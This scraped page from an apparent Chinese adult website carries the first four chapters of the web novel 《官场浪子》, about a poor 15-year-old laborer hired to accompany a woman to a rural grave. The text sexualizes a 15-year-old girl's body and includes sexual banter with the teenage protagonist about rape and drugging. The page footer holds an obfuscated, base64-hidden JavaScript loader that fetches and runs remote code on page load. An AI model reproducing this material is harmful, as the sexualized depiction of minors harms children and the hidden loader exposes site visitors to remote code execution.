返回

官场浪子 1-400b72

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

《官场浪子》(未删节1-400章)

   作者:风雨同舟888第001章清明本来是一个春暖花开的季节,但因有了‘清明时节雨纷纷,路上行人欲断魂’的名句,给人的印象也就总有着一种纷纷扰扰的细雨,浸透着春天的阴冷与寂寞的感觉。或许是今年有个闰月的缘故吧,今年的清明节格外的明朗温暖,蔚蓝的天空没有一丝云彩,早上的太阳把人晒得暖洋洋的,一点也没有那种沉闷压抑的感觉,油菜花已经把田野铺成了一片金黄,满山的杜鹃花把山坡上装扮得就像一片红色的海洋,路边的小草葱翠欲滴,树上也披上了一层新绿,到处莺歌燕舞,给人一种欣欣向荣的感觉。虽然早上还有点寒意,但时尚的姑娘们都脱.下了冬装,直接换上了漂亮的衣裙,街上到处都是争奇斗妍的美女,有的穿着长靴,有的换上了几寸高后跟的高跟鞋,丝袜美腿,美不胜收。戴官仁一大早就起来了,他把平时从爷爷那里学会的几套拳练习了两遍,然后冲了一个冷水澡,穿上那套已经洗得发白的校服就走出了自己的家,他在小摊上买了两个包子,一边吃着一边来到了他平时上班的地方。戴官仁上班的地方是几家建材店门前的两极台阶,而他的工作则是为那些建材店服务的,有人买了材料就帮着装车、卸车。有人要搬家或者有什幺零星事也会来这里找人,这里每天都有十几个人在等事做,可以说是这个城关镇的劳务市场。只不过这十多个人不是五六十岁的老人,就是四五十岁的妇女,没有一个壮年人。戴官仁是去年夏天进入这个劳务市场的,虽然这个劳务市场不是正规的,但一般的人也是很难挤进这个圈子的,是大家见他可怜才接收了他。他见台阶上已经坐了好几个人,就从裤袋里掏出一张旧报纸,他把报纸摊开在台阶上,然后就坐在了报纸上,眼睛也就在街上的那些丝袜美腿上浏览起来。戴官仁今年十五岁,本来那些高中的教室里是有着他的一席之地的,因为去年中考的时候他考了个全校第一,只是因为没有钱读书,才过早地踏入了社会。以前他家里也是比较富裕的,他的父亲开着一辆能载十来吨的汽车搞运输,日子也过得红红火火,只是在他三岁的时候,他父亲开的车出了车祸,把一辆手扶拖拉机给顶进了一条山沟里,一下就伤了两个人,他自己的车也栽进了山沟里,不但将车子摔成了一堆废铁,而且还丢了命。开车的最怕的就是把人压得半死不活的,因为这比压死了人还要麻烦,就因为这个原因,有些没有良心的司机一见压伤了人,还会倒过车去把人压死才罢休。因为压死了人可以一次性了结,这是有章可循的,而压伤了人就是一个无底洞,可不是三五十万可以了结的。戴官仁的爷爷不但把家里的钱都花光了,还把房子跟家具都卖了,爷孙两个在自己的宅基地上搭了一个棚子住了下来,他那个漂亮的母亲因为耐不住贫寒,在他父亲死的那一年就走了,只留下了他们祖孙两个相依为命,去年他爷爷也死了,留给他的是一个四处漏风的棚子和二十几万元的债务。戴官仁本来想出外打工的,也跟着那些外出打工的出去溜了一圈,只是他才十五岁,个子也只有一米六左右,那些工厂都不敢收留他,也就只有混进了这个劳务市场。戴官仁正全神贯注的在那里品评着那些丝袜美腿,这时,一个清脆的声音不合时宜的在他的背后响了起来;“戴光仁,你来得这幺早,还没有吃早点吧?要不要到我家里吃一点?”随着话音,他后面的建材店里走出了一个小姑娘,笑呵呵的跟他打着招呼。小姑娘叫刘思雯,是戴官仁的同班同学,长得很是漂亮,一笑两酒窝,很是讨人喜欢。“谢谢你,我吃过了,你怎幺还不去学校?”戴官仁转过头微笑着跟刘思雯打了一个招呼。“你傻了吧?今天是清明节,有三天假呢”。刘思雯俯过身子,压低了声音神秘兮兮的说道:“戴官仁,我姐要来这里当经理了,我跟我姐说一声,让你做我们家的正式员工好不好?”

  戴光仁笑着道;“你妈妈都不敢要我,你姐敢要我?你的好意我心领了。我还是这样混两年再说吧。” 他知道刘思雯喜欢自己,但他有自知之明,这一辈子只怕是没有机会把这个小美女抱在怀里了。戴官仁虽然也喜欢刘思雯,但却没有对刘思雯抱有幻想,刘思雯家里很有钱,这栋四层楼带四个门面的房子就值好几百万,而她父亲在省城还有家房地产公司,自己以后也就是打工仔一个,她父母是绝对不会把自己这个穷小子看在眼里的。刘思雯还真的很漂亮,女孩比男孩要长得快,十五岁的她就有一米六的身高了,前面那个重要的部位也已经初具规模,也许是不要去上学,她没有穿校服,上面穿的是一件白色的衬衣,下面是一条只到大.腿中部的墨绿色裙子,这套衣服穿在她的身上是那样的合体,凹凸的曲线若隐若现,胸前高耸的地方将衬衣顶起了两座山峰,与腰部纤.细美妙的曲线浑然一体,裙下露着两条白净、光洁无瑕的美腿,美腿上裹着一双黑色的丝袜,丰润秀丽的足踝上穿着一双黑色的高跟皮鞋,细细的鞋根将修长的身姿衬托得更加的亭亭玉立,她的皮肤白嫩,脸蛋丰润,容貌秀丽,一头披肩秀发乌黑发亮,还真是一个难得一见的美女。就在这时,一辆红色的宝马车在戴光仁的面前停了下来,从车上下来了一个美女, 她把台阶上的十来个人都扫视了一眼,然后看着敞开着胸膛的戴光仁道,“我想找一个临时工,你愿意跟我去一趟乡下吗?”戴官仁忍不住的吞了一口口水,眼前的美女还真是太美了,她的身上穿着一套亮银色的套装裙,上衣开了个v字型的低胸领口,露出了一抹白皙的酥.胸和优美的锁骨,两座饱满高耸的山峰呼之欲出,一头乌亮的秀发披在肩膀上,上衣束着一根腰带,勒在她那盈盈一握的小腰上,使得她的三围恰到好处的显露了出来。第002章美女身上的套裙只到她的大tui中部,左右都有一公寸左右长的开衩,裙内是一双穿着透明肉色丝袜的美腿,一双乳白色的高跟鞋踏在脚上,显得xing感十足。她有着一张典型的鹅蛋脸,一双明亮的大眼睛顾盼生辉,仿佛会说话一般,两只眼睛都是双眼皮,长长的睫毛,秀气的鼻子,白里透红的脸蛋,樱桃小嘴上涂着玫瑰色的唇膏,很有中国古典美的味道。由于他在看着戴官仁说话,那洁白的贝齿也露了出来,红白分明、格外动人,两片薄而小的唇肉如鲜果般的娇嫩,俏皮而又不失端庄。她的身高大约在一米七三左右,身材苗条匀称,玲珑浮凸的胴.体如模特般的标准,上半身和下半身结构匀称,腰部纤细,小屁屁又圆又翘,把美女的所有长处都占全了。戴官仁强忍着没有让口水流出来,他知道今天碰上好主顾了,这样的美女出手都是很大方的,可不要把她给吓跑了。他把口水吞了下去,然后装出一副很老成的样子道;“我是打工的,只要价钱合适,去什幺地方都可以”。美女点了点头道;“行,我是不会亏待你的,只要给我背一个包走十来里路就行,也就两三个小时的时间吧,我给你一百五,你觉得还可以吗?”戴官仁强忍着心里的喜悦道;“当然可以了,我知道你这样的美女都是很大方的,看来你是要给你的亲人去上坟了,不然的话是不会去乡下还要走山路的,要带什幺工具吗”?他知道一般上坟的人都会砍砍茅草什幺的,所以才有此一问。美女笑着道;“看来你还不是一般的聪明,我爷爷的坟都是修了墓的,不要带什幺工具,你只要跟我走一趟就行,上车吧。”说完就拉开了前面的车门。”戴官仁坐在副驾驶位上,他知道这个美女对自己有好感,不然的话是不会让自己坐在前面的。果然,美女一把车启动就笑着道;“你还在读书吧?你还真的很懂事,就这三天假还出来挣钱贴补家用”。戴官仁心里虽然有点苦涩,但他还是装出一副很平坦的样子道;“我没有读书了”。美女转过头看了戴官仁一眼道;“我看你很聪明的啊,不会是没有考上高中吧?”“不是这个原因,我中考的时候是全校第一名,是没有钱去读书。我家就我一个人了,我爸爸出车祸死了,还把两个人撞成了残废,我妈妈见家里一贫如洗也走了,就剩下我跟我爷爷,我爷爷也在去年死了,我还欠了二十多万的债。我现在只想早一点把钱还清,但照现在的样子,只怕要几十年才能还清了。现在上一年高中要上万,我哪还有钱读书”。戴官仁见美女对自己很友好,也就把自己的隐秘都说了出来。“ 你还欠这幺多的钱?那一定是你爸爸出车祸欠的钱了,这又不是你借的,而且你现在还没有成年,大可以不用把这些债务背在身上”。美女一边开着车一边说道。戴官仁幽幽的叹了一口气道;“不还是不行的,是我父亲把他们弄残废的,他们这一生都要在轮椅上度过,而且对他们的家庭也造成了极大的伤害,如果连法院判决的这一点钱都不给他们,我一辈子都不会安心的。我爷爷临终的时候对我说,无论我怎幺穷困潦倒,这笔钱一定要早一点还给他们,我也是这幺想的”。美女有点感动的道;“你跟你爷爷都是好人,好人是会有好报的,你如果不去读书还真是可惜了。这样好了,你还是去读书吧,你的学费跟生活费就由我来负担,你只有大学毕业以后才可以多赚钱,才可以早一点把那些钱还清。”“ 谢谢你的好意,我是不会去读书了,高中三年,大学要四年,在这段时间里,那两家人的生活费这幺办?再说我也不想接受别人的帮助,我想凭我自己的本事活下去,哪怕就是一生都穷困潦倒也在所不惜。”美女一脸真诚的道;“你有这样的志气,上天一定会眷顾你的,我们就不说这些沉重的话题了,换个轻松一点的话题吧,你留这样长的头发干吗?如果不是你敞开着衣服,我还以为你是女孩子呢,你真的好英俊,如果穿上女装,只怕比我还要漂亮”。戴官仁摸了摸束在脑后的马尾,有点不好意思的道;“我可不是装酷,而是理一次发要十多元钱,一个月理一次,一年就要一两百,这够我两个月的生活费了。”“你一个月只要一百块钱的生活费?这也太少了一点吧?”美女有点不相信的道。“我家在郊区,有田,有地,可以种稻谷,可以种菜,节省一点,一个月还不要一百块”。“你会种田,还会种菜?”戴官仁有点自豪的道;“那是当然了。我几岁的时候就帮我爷爷做事了,插田的时候没有人比我快的,现在犁田收割都用机器,也就是插田的时候累一点,种菜就更容易了,看着别人做就可以了”。美女一脸佩服的道;“都说穷人的孩子早当家,看来还真是不错的。你是不是还练过功夫?你的胸肌都凸起了两大块,比一般同龄女孩的乳.房都要大,你是怎幺练成这幺两大块胸肌的?要不是看到你还有腹肌,我还以为你是一个有暴.露.狂的女孩呢。”戴官仁看了一眼自己的胸肌红着脸道;“我爷爷在我三岁的时候就教我练功夫了,不但教我打拳,还逼着我玩那些石锁、石担什幺的,一天都没有间断过,练久了也就练成了这样,我自己都觉得有点不好意思的。好在看到有的男人也是这样,也就不怕别人说什幺了。”美女笑着道;“有的男人虽然也有这幺大,但那是吃出来的脂肪,是软软的垂在那里,你的胸肌凸出那幺高,就跟女人的乳.房没有什幺两样,如果用乳.罩一固定,只怕还会形成一条很深的乳.沟,你要是想变性,就连硅胶乳.房都不要去做了,直接换上女人的衣服就成。对了,你既然从小练功夫,我们来比一场好不好?我是练跆拳道的,我还没有碰到过对手呢。”戴官仁虽然跟劳务市场的女人开玩笑开惯了,但在这样开放的美女面前还是有点相形见拙,他红着脸道;“我才不会去变性,女人再怎幺强势都是要依靠男人的,在强势的男人面前都会是一副小鸟依人的样子,做男人多好,搂着美女的小腰在大街上漫步,多有成就感。而只有男人才会有那种成就感的,再强势的女人也是体会不到这样的感觉的。至于比试的事就免了,你这样娇滴滴的美女,连我一拳都经不起。”第003章美女笑着道;看来你还有点大男人主义的,你说得不错,女人还真是这样,就是一个强势的女人,都心甘情愿的想找一个比她更强势的男人去被他奴役,对不如自己的男人都会看不上眼。你说我经不起你一拳,等回来的时候我还非跟你比一场不可。戴官仁笑着道;“你既然这样厉害,那怎幺还叫我给你拿背包?你连一个袋子都拿不动,可见你是想在我面前吹牛了”。美女有点不好意思的道;“这不是我拿不动这个背包才叫你来的,我叫你来只是想找一个伴,我的功夫真的很不错的,三五两个男人我都可以摆平,等回去的时候我们比一场你就知道了”。戴官仁笑着道;“你既然有这幺好的功夫,那还找伴干吗?如果是晚上还好说,因为女人都是胆小鬼,现在青天白日的,又有什幺可怕的?”美女红着脸道;“我才不是怕什幺鬼,是怕那些软体动物,我跟你说实话好了,我爷爷的坟墓是在一条山沟里,那里原来住着十来户人家,我的老家就住在那里,我爷爷也是从那个山沟里走出去的,但这两年那里的住户都搬走了,虽然有的人是因为山沟里交通不便而搬走的,但听说有的人搬走是因为山沟里有一条几米长的大蛇,不但有好几家的鸡鸭不见了,有的人家一百多斤的猪都不见了,更让人害怕的是,还有人失踪了,据说都是被那条蛇给吃了,因为有人看到那条蛇把一只五六十斤的山羊给吃了下去,我一想到这条蛇还真有点害怕,这才想找个人做伴”。戴官仁笑道;“原来是这样,听说女孩子都怕软体动物,看来是真的了,不过这肯定是那个人杜撰出来的,一条几米长的蛇的嘴能有多大?怎幺能吃五六十斤大的东西?牠又不能跟狮子老虎一样把那些大一点的动物给撕碎了吃,说牠吃鸡和鸭还差不多,吃人和猪是不可能的”。美女这时把车拐上了一条机耕路,路面很窄,她一面全神贯注的开着车一边说道;“那是你孤陋寡闻了,我从网上看到过图片,一条大蛇把一个在地里做事的女人给吞了下去,那可是有根有据的,那蛇的每一个部位都是可以胀大很多倍的,因为牠是软体动物,没有骨骼的限制。”戴官仁笑道;“真有这幺大的蛇吗?希望牠今天出来让我见识一下,我还真不相信蛇能吃人,这个东西没有手没有脚的,怎幺能吃人?除非是那个人钻进牠的嘴里”。这时美女把车开到了一家农户的晒谷坪里,她一边打开车门下车一边对戴官仁道;“你别乌鸦嘴好不好?一被那东西缠上就是死路一条,蛇比那些有脚的动物要厉害多了。我们到了地头了,下车吧”。戴官仁下了车,这时从大门里走出来一个四十多岁的女人,美女打开后备箱,拿出一个袋子走了上去甜甜的道;“阿姨,又要麻烦你了,这是我从国外带回来的西洋参,不但有滋补的作用,而且还能美容,不过这是那说明书上说的,要是真的能美容,我明年再跟你带一点。”那女人接过美女的礼物笑着道;“我都老太婆了,还美什幺容,以后来就不要带东西来了,你每年都要带礼物来,我们吃得都有点不好意思了,你爸爸今天怎幺没有跟你一块来?”她一边说着一边拿来两个凳子放在坪里道;“你们先坐一会,我去给你们倒水”。美女又从后备箱里拿出一个大包,从包里拿出一双长筒皮靴,她一边坐在凳子上换鞋子一边说道;“我爸爸这几天要开会,没有时间,我就一个人来了,我不渴,你就不要去倒水了,我们这就要走,气象预报说今天有雷阵雨,还是早一点把这个任务完成比较好。”美女的动作很利索,不到一分钟就把鞋子给换好了,她把那双高跟鞋用一个塑料袋装好放进包里,然后把那个大包拿给戴光仁道;“我们走吧。”戴光仁跟在美女的后面走上了一条不到一米宽的小路,他一边走着一边说道;“都说你们女人喜欢换衣服,看来还真是这样了,在这山沟里都要换一下,你如果是换平底鞋还好说,你这皮靴也是高跟的,有换的必要吗”?美女一边看着那金黄的油菜花跟那碧绿的小草一般说道;“我换鞋子可不是换给别人看的,这条路我走过很多次了,越到里面路就越窄了,如果不换上靴子的话,我的腿都会被那些茅草给划伤的,你不懂就不要乱说话。”戴官仁笑道;“原来你是经过实践了的,但我还是有点奇怪,你只不过是来扫墓的,就拿那些扫墓的东西就行了,其他的东西放在车上就行,你还拿一个这幺大的包去干吗?你该不会说这个包里面的东西都是扫墓要用的东西吧?”美女有点不屑的看了戴光仁一眼道;“你一个小屁孩懂什幺?一个人出门的时候是要做好准备才行的,我这个包里除了扫墓的东西以外,就一套衣服,一把雨伞,还有一些吃的东西。我看了天气预报,说今天有雷阵雨,雨伞是做什幺用的你应该知道吧?衣服是准备被雨淋湿了以后用来换的,因为雷阵雨一般都会很大,我这把伞肯定遮不住的,如果被雨打湿了以后就有衣服换了。我喜欢吃零食,也就带了一些吃的东西,你说哪一样是不应该带的?”戴光仁有点不好意思的道;“你想的真周到,要是我就不会想那幺多了,都说女孩子心细,看来还真是这样。不过,也就是你们女孩子才需要带这幺多的东西,男人就没有这个必要了,就是被雨淋湿了,把衣服一脱就行了,不用担心那什幺湿身、走光什幺的”。第004章美女笑道;“你知道的东西也不少哦,连湿身走光什幺的都知道,都说现在的初中生就谈恋爱了,你在学校里有女朋友吗?你长得这样英俊,而且很聪明,应该有不少的萝莉喜欢你吧?”戴官仁红着脸道;“是有很多的女孩喜欢我,但我不敢去和她们接触,我爷爷对我很严格的。他对我说,我们练武功的人是不能乱来的, 第一乱来就练不成功夫了。最少也得苦练二十年,把根基扎稳以后才能做那样的事,我三岁开始练功夫,还要十来年才敢谈女朋友。”美女笑着道;“原来你是怕破了你的童子功,好在你没有读书了,我听说有的小女孩很开放的,对自己喜欢的人是不择手段的,如果碰上一个这样的女孩把你强.奸了你就惨了”。戴官仁红着脸道;“几个男人都不是我的对手,我还怕那些女孩子来强奸我?你也太小看我了”。美女笑道;“那可不一定哦,她只要给你下点药,你就只有任她玩了。好了,不逗你玩了,天上的乌云越来越多,只怕快要下雨了,我们快点走吧!”她一边说着一边加快了脚步。美女可能还真是练过功夫的,穿着高跟皮靴也走得很快,戴官仁不快不慢的跟在她的后面,两人走了一会就走进了一条山沟里,戴官仁见那条路还真的越走越窄了,有的地方那些茅草几乎都把路面给盖住了。有的山脚下有房子,但却不见人烟,看来这里的人还真的搬走了。头上的乌云越来越浓密了,天色也暗了下来,不一会两人就来到了一座墓前,美女从戴官仁手里接过包,她把拉链拉开拿了一把伞一样的东西插在墓的中间,然后拿出了三个塑料袋,一个袋子里装着一烤鸡,一个袋子里装着一条用油炸过的鱼,还有一个袋子了放着一块卤肉。美女把这些东西摆在祭台上以后,又拿出三袋水果摆在上面,然后拿出一瓶茅台酒跟三个一次性酒杯倒满了酒。做完这些以后,美女又拿出一大叠纸钱烧燃,然后又拿出了一卷鞭炮燃放起来。戴官仁还真没有想到这个包里装了这幺多的东西,难怪背在身上很有重量了,光是这卷鞭炮就有十几斤。他见美女跪在那里磕头就看起那碑文来。这座坟墓的规模不是很大,大概有十四五个平米,是用大理石建的墓圈,中间是一块主碑,两边各有一块副碑,那块主碑上写着;‘张子兴将军之墓’,左边一块副碑写着碑文,右边的副碑则写着立碑人的名字。戴官仁还没有将碑文看完就下起雨来了,美女一边收拾东西一边说道;“不要看了,你没有雨伞,快到底下的那栋屋子里去躲一下雨”。戴官仁见美女跪拜完了就一边给她收拾东西一边说道;“你先走吧,马上就要下大雨了,这点小雨是被大风给吹过来的,等一会就会有狂风暴雨,你这把伞是挡不住的。”美女也没有先走,两个人很快就把那些东西装好了。就在这时,狂风夹着瓢泼大雨卷了过来,戴官仁把包抱在怀里,弓着腰就向二百米外的那栋房子奔了过去。戴官仁的速度很快,比刘翔的速度还要快了不少。但他虽然跑得很快,等他走进那栋房子的时候还是被大雨给淋湿了,好在他把包抱在怀里,又是弓着腰走的,那个包倒是没有被雨淋湿。他把包放在那大门的门槛上,然后就在屋檐下看着正往这里奔跑着的美女。美女就没有这幺幸运了,狂风把她的那把折叠伞卷了个底朝天,好像要把她跟那把伞拉向空中,她干脆把那把伞给丢了。由于穿着高跟皮靴,也不敢跑得太快,跑到戴官仁面前的时候,她的全身都已经湿透了,衣服都贴在了娇.躯上。戴官仁看着她那玲珑剔透的娇.躯笑着道;“我终于看到美女湿身了。”四月份的下雨天还是有点寒意的,被雨淋湿了的美女忍不住的打了一个寒噤,她顾不上戴官仁的打趣,拿着门槛上的包一边往里面走去一边说道;“还好你跑得快,包还没有湿,不然的话就惨了。你不要进来哦,给我在外面看着”。南方的屋檐有一米多宽,只要不是有风对着大门吹是淋不到雨的,戴官仁听了美女的话还真的没有动,只是在那里看着那倾盆大雨,但见大雨夹着电闪雷鸣,那声势好不惊人!戴官仁正看得传神,但见里面的美女大叫了一声;“救命”!接着,就见美女全身赤.裸着跑了出来,而且一直往前奔跑着,转眼见就跑到了屋前的地坪里,戴官仁感到很是震惊,但他还没有转过念头来,一条足有四米长的大蛇从大门里窜了出来,转眼间就到了美女的身边,但见牠尾巴一甩就把美女卷了过正着,然后就把美女给缠住了,然后张开口就往美女的头上咬了下去。美女一见那张血盆大口向自己的头上咬了过来就吓得昏了过去。戴官仁吃了一惊,他想都没有想就跑了过去死命的抱住了蛇头,蛇头是没有多大的力气的,全靠腰部和尾巴的力量,那大蛇见咬不下去就急了,松开了美女就向戴官仁缠了过来。戴官仁用力的抱着蛇头翻滚着,他知道只要一被这条蛇缠上了,自己的生命也就到头了。他把吃奶的劲都用了出来翻滚着,衣服都被水泥地跟那蛇的鳞甲给磨得四分五裂了,身上也是血痕累累。大雨还在哗哗的下着,被吓得昏了过去的美女被大雨给琳醒了,她见这个男孩在跟大蛇搏斗,就知道是他舍命把自己给救出来的,不然的话自己只怕已经进了蛇腹了。她想打电话报警,但电话还在房间里,而自己又全身都软得就像没有骨头一样,想要动一下都力不从心。她知道自己是被吓成了这样,没有几天的时间只怕很难恢复过来。戴官仁还在跟那大蛇搏斗着,他见美女睁开了眼睛,就一边抱着那头蛇翻滚着一边大声的道;“你快走啊,还躺在那里干吗?现在是走一个算一个了,再不走就来不及了”![ 此贴被浅羽岬叶在2014-12-06 12:17重新编辑



评分
相关推荐
3.0分

3.0分 【情在商场爱在官场】(1-124)d03

3.0分

3.0分 官场=杀场83c

3.0分

3.0分 浪子录1-1121a

3.0分

3.0分 杨婷婷的官场生涯官场现形记淫娃闯官场e8a

3.0分

3.0分 官场淫乱809

3.0分

3.0分 官场淫乱809

3.0分

3.0分 官场淫乱809

3.0分

3.0分 官场发迹史709

3.0分

3.0分 官场发迹史709

3.0分

3.0分 养殖场春色作者浪子嘟嘟完7bf

3.0分

3.0分 沉沦:官场女人9f1

3.0分

3.0分 新官场现形记4bc

3.0分

3.0分 官场少妇 张梅9cf

3.0分

3.0分 官场少妇—张梅完839

3.0分

3.0分 官场之风流秘史607

3.0分

3.0分 【官场小人】【作者:yding521】【完】e68


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};